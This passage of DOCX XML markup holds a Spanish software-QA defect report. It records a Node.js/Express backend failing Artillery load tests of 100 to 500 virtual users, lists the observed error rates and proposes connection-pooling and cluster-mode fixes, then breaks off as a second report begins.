            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Artillery v2.0.32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-R-04, TC-R-06, TC-R-09 — Rendimiento bajo carga alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend no sostiene 64+ usuarios concurrentes — ERR_SOCKET_TIMEOUT / ECONNREFUSED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">El servidor Node.js/Express falla ante cargas de 100+ VUs con ERR_SOCKET_TIMEOUT y ante 200+ VUs con ECONNREFUSED. El sistema no implementa connection pooling adecuado ni manejo de colas de peticiones bajo carga.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo en http://localhost:4000.
2. Usuario loadtest@test.com en BD (node tests/performance/setup-load-data.js).
3. Artillery v2 instalado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04: npx artillery run tc-r-04-leaderboard-carga.yml (100 VUs).
TC-R-06: npx artillery run tc-r-06-registro-masivo.yml (200 VUs).
TC-R-09: npx artillery run tc-r-09-login-estres.yml (500 VUs).
Verificar VUs completados y tasa de error en reporte JSON.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04: p95 ≤ 2000ms, 100/100 VUs completados, error &lt; 1%.
TC-R-06: ≥95% HTTP 201, p95 ≤ 2000ms.
TC-R-09: error &lt; 5% en fase de pico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04: 36/100 VUs completados (64% falla), ERR_SOCKET_TIMEOUT.
TC-R-06: 0/200 VUs (100% falla), ECONNREFUSED=31, ERR_SOCKET_TIMEOUT=169.
TC-R-09: 100% error rate, ECONNREFUSED en todas las fases.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: MongoDB in-memory (test) no soporta alta concurrencia de escritura. En producción con MongoDB Atlas el comportamiento mejoraría.
Además: Express sin cluster mode, sin worker threads, sin connection pooling configurado.
Correción sugerida: Configurar mongoose connection pooling (poolSize:10), usar pm2 cluster mode, o mover a MongoDB Atlas para pruebas de carga realistas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
